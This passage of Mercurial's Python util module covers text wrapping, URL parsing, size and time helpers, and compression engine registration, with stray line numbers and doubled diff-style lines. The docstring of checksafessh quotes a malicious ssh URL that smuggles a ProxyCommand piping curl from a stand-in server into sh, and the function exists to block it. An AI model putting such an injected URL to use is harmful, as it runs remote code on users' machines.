        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2328
2327
def uirepr(s):
    """repr() a string for display, collapsing doubled backslashes.

    Avoids the double backslash that repr() produces in Windows paths.
    """
    shown = repr(s)
    return shown.replace('\\\\', '\\')
2332
2331
# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Return (head, rest): head fills at most space_left display
            # columns as measured by encoding.ucolwidth.
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            # Break an over-long chunk by display columns rather than by
            # character count.
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                # cannot break words: put the whole chunk on its own line
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    # width of the next chunk in display columns
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # Cache the subclass in this module-level name so subsequent calls
    # construct instances directly without redefining the class.
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2436
2435
def wrap(line, width, initindent='', hangindent=''):
    """Word-wrap a byte string to the given display width.

    initindent prefixes the first output line, hangindent every later
    one. The text is decoded to unicode for width-aware wrapping and
    re-encoded before returning.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    # convert encoding names once instead of per decode call
    enc = pycompat.sysstr(encoding.encoding)
    encmode = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(enc, encmode)
    initindent = initindent.decode(enc, encmode)
    hangindent = hangindent.decode(enc, encmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(enc)
2452
2451
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #            | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # read via os.read (retrying on EINTR) and re-split into lines
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # trailing partial line: keep for next read
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        # regular on-disk files are treated as "fast" and iterated
        # directly; everything else goes through the EINTR-safe path
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2524
2523
def iterlines(iterator):
    """Yield each line of every text chunk produced by *iterator*."""
    for chunk in iterator:
        # a chunk may hold zero or more (possibly partial) lines
        for ln in chunk.splitlines():
            yield ln
2529
2528
def expandpath(path):
    """Expand environment variables and '~' constructs in a path."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2532
2531
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            # frozen via py2exe or similar: run the executable itself
            return [pycompat.sysexecutable]
    # not frozen: defer to the platform-specific helper
    return gethgcmd()
2547
2546
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # reap the child and record its (pid, status)
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        # install our reaper, remembering the previous handler to restore
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # give up if the child is gone and the condition still fails
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2582
2581
2583 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2582 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2584 """Return the result of interpolating items in the mapping into string s.
2583 """Return the result of interpolating items in the mapping into string s.
2585
2584
2586 prefix is a single character string, or a two character string with
2585 prefix is a single character string, or a two character string with
2587 a backslash as the first character if the prefix needs to be escaped in
2586 a backslash as the first character if the prefix needs to be escaped in
2588 a regular expression.
2587 a regular expression.
2589
2588
2590 fn is an optional function that will be applied to the replacement text
2589 fn is an optional function that will be applied to the replacement text
2591 just before replacement.
2590 just before replacement.
2592
2591
2593 escape_prefix is an optional flag that allows using doubled prefix for
2592 escape_prefix is an optional flag that allows using doubled prefix for
2594 its escaping.
2593 its escaping.
2595 """
2594 """
2596 fn = fn or (lambda s: s)
2595 fn = fn or (lambda s: s)
2597 patterns = '|'.join(mapping.keys())
2596 patterns = '|'.join(mapping.keys())
2598 if escape_prefix:
2597 if escape_prefix:
2599 patterns += '|' + prefix
2598 patterns += '|' + prefix
2600 if len(prefix) > 1:
2599 if len(prefix) > 1:
2601 prefix_char = prefix[1:]
2600 prefix_char = prefix[1:]
2602 else:
2601 else:
2603 prefix_char = prefix
2602 prefix_char = prefix
2604 mapping[prefix_char] = prefix_char
2603 mapping[prefix_char] = prefix_char
2605 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2604 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2606 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2605 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2607
2606
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # Not a plain number: fall through to a service-name lookup.
        try:
            return socket.getservbyname(port)
        except socket.error:
            raise Abort(_("no port number associated with service '%s'")
                        % port)
2624
2623
_booleans = {'1': True, 'yes': True, 'true': True, 'on': True,
             'always': True,
             '0': False, 'no': False, 'false': False, 'off': False,
             'never': False}

def parsebool(s):
    """Map a spelled-out boolean string to True/False.

    The lookup is case-insensitive; any unrecognized string yields None.
    """
    return _booleans.get(s.lower())
2635
2634
2636 _hextochr = dict((a + b, chr(int(a + b, 16)))
2635 _hextochr = dict((a + b, chr(int(a + b, 16)))
2637 for a in string.hexdigits for b in string.hexdigits)
2636 for a in string.hexdigits for b in string.hexdigits)
2638
2637
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url('http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url('ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url('file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url('file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url('bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url('bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(r'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(r'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(r'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(r'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url('ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url('ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url('http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url('')
    <url path: ''>
    >>> url('#a')
    <url path: '', fragment: 'a'>
    >>> url('http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url('http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url('http:')
    <url scheme: 'http'>
    """

    # characters left unescaped when quoting user/passwd components
    _safechars = "!~*'()+"
    # characters left unescaped when quoting path/fragment components
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        # _localpath stays True for plain filesystem paths (no scheme)
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                # rsplit so that '@' may appear inside the password
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def __repr__(self):
        # Debug representation listing only the components that are set.
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> str(url('http://localhost:80//'))
        'http://localhost:80//'
        >>> str(url('http://localhost:80/'))
        'http://localhost:80/'
        >>> str(url('http://localhost:80'))
        'http://localhost:80/'
        >>> str(url('bundle:foo'))
        'bundle:foo'
        >>> str(url('bundle://../foo'))
        'bundle:../foo'
        >>> str(url('path'))
        'path'
        >>> str(url('file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> str(url('file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print url(r'bundle:foo\bar')
        bundle:foo\bar
        >>> print url(r'file:///D:\data\hg')
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                # file:///c:/... needs the extra slash before the drive
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # bracketed IPv6 literals are emitted verbatim
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
            if self.port:
                s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        # Return (url-without-credentials, authinfo-tuple-or-None);
        # credentials are temporarily cleared so bytes(self) omits them.
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        # True when the URL cannot be joined onto a base path.
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        # Local filesystem path for file:/bundle: URLs; otherwise the
        # original, unparsed path string.
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
2941
2940
def hasscheme(path):
    """Tell whether *path* carries a URL scheme prefix (e.g. 'http:')."""
    parsed = url(path)
    return bool(parsed.scheme)
2944
2943
def hasdriveletter(path):
    """Tell whether *path* starts with a Windows drive letter ('c:...').

    Falsy input (empty string, None) is returned unchanged, mirroring the
    short-circuit of the original ``path and ...`` expression.
    """
    if not path:
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
2947
2946
def urllocalpath(path):
    """Return the local filesystem path for *path* parsed as a raw URL.

    Query strings and fragments are not split off; they remain part of
    the path component.
    """
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
2950
2949
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    # an ssh host beginning with '-' would be parsed by ssh as an option
    if path.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
2965
2964
def hidepassword(u):
    """Return the url string *u* with any password masked as '***'."""
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
2972
2971
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Serialize via bytes() for consistency with hidepassword() above;
    # str() would go through encoding.strmethod and produce a unicode
    # string on Python 3, while callers of these helpers deal in bytes.
    return bytes(u)
2978
2977
# Format a duration given in seconds as a human-readable string, picking
# the unit (s / ms / us / ns) and number of decimals from the magnitude.
# Each entry is (threshold-multiplier, divisor, format) for unitcountfn.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
2994
2993
# Current indentation (in spaces) for nested @timed reports; kept in a
# one-element list so the closure below can mutate it in place.
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        # indent any timed calls made while func is running
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            # report even when func raises; timing is best-effort
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper
3021
3020
# Size suffixes and their byte multipliers. Order matters: a suffix is
# matched with endswith(), so this exact sequence must be preserved.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint('30')
    30
    >>> sizetoint('2.2kb')
    2252
    >>> sizetoint('6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                number = float(spec[:-len(suffix)])
                return int(number * multiplier)
        # no recognized suffix: the whole spec must be an integer
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3043
3042
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source-name, callable) pairs, sorted lazily at call time
        self._hooks = []

    def add(self, source, hook):
        """Register *hook* under the given *source* name."""
        self._hooks.append((source, hook))

    def __call__(self, *args):
        """Invoke every registered hook with *args*, ordered by source
        name, and return the list of their results."""
        self._hooks.sort(key=lambda entry: entry[0])
        return [hook(*args) for _source, hook in self._hooks]
3061
3060
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
        length of longest filepath+line number,
        filepath+linenumber,
        function

    Not be used in production code but very convenient while developing.
    '''
    # drop this function's own frame plus the 'skip' innermost callers
    frames = traceback.extract_stack()[:-skip - 1]
    entries = [(fileline % (fname, lineno), func)
               for fname, lineno, func, _text in frames]
    # depth == 0 keeps everything, since [-0:] is the whole list
    entries = entries[-depth:]
    if not entries:
        return
    width = max(len(location) for location, _func in entries)
    for location, func in entries:
        if line is None:
            yield (width, location, func)
        else:
            yield line % (width, location, func)
3084
3083
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Write msg plus a formatted stack trace to f (stderr by default).

    Skips the 'skip' entries closest to the call, then shows 'depth'
    entries. otherf (stdout by default) is flushed first so interleaved
    output stays ordered. Usable everywhere; intentionally requires no ui
    object. Not to be used in production code, but very convenient while
    developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 also hides debugstacktrace's own frame
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(frameline)
    f.flush()
3099
3098
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style mapping: ignore entries whose state is 'skip'
            for fname, entry in map.iteritems():
                if entry[0] != skip:
                    addpath(fname)
        else:
            for fname in map:
                addpath(fname)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # finddirs yields longest-first, so once a prefix is known
                # every shorter ancestor is already counted too
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                # still referenced by other paths; ancestors stay as well
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3135
3134
# Replace the pure Python dirs class above with parsers.dirs when the
# parsers module provides one (presumably a faster native implementation
# — TODO confirm against the parsers module).
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3138
3137
def finddirs(path):
    '''Yield each ancestor directory of a '/'-separated path, longest
    first (e.g. 'a/b/c' -> 'a/b', 'a'). Yields nothing for a bare name.'''
    pos = len(path)
    while True:
        pos = path.rfind('/', 0, pos)
        if pos == -1:
            break
        yield path[:pos]
3144
3143
# compression code

# Roles used when querying wire protocol compression engine support.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire protocol support: the advertised format name
# plus an advertisement priority for each role (higher advertised first;
# non-positive values are not advertised — see compressionengine.
# wireprotosupport for the semantics).
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3153
3152
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to engine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        """Look up an engine by its registered name."""
        return self._engines[key]

    def __contains__(self, key):
        """Whether an engine of this name has been registered."""
        return key in self._engines

    def __iter__(self):
        """Iterate over registered engine names."""
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Raises ``error.Abort`` if any of the engine's identifiers (name,
        bundle name/type, wire protocol name, revlog header) collides with
        an already-registered engine.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared (a false-y bundlename means
            # the engine is internal-only).
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        # Record the engine only after all collision checks passed.
        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        """Set of user-facing bundle spec names with a registered engine."""
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        """Set of internal bundle identifiers with a registered engine."""
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
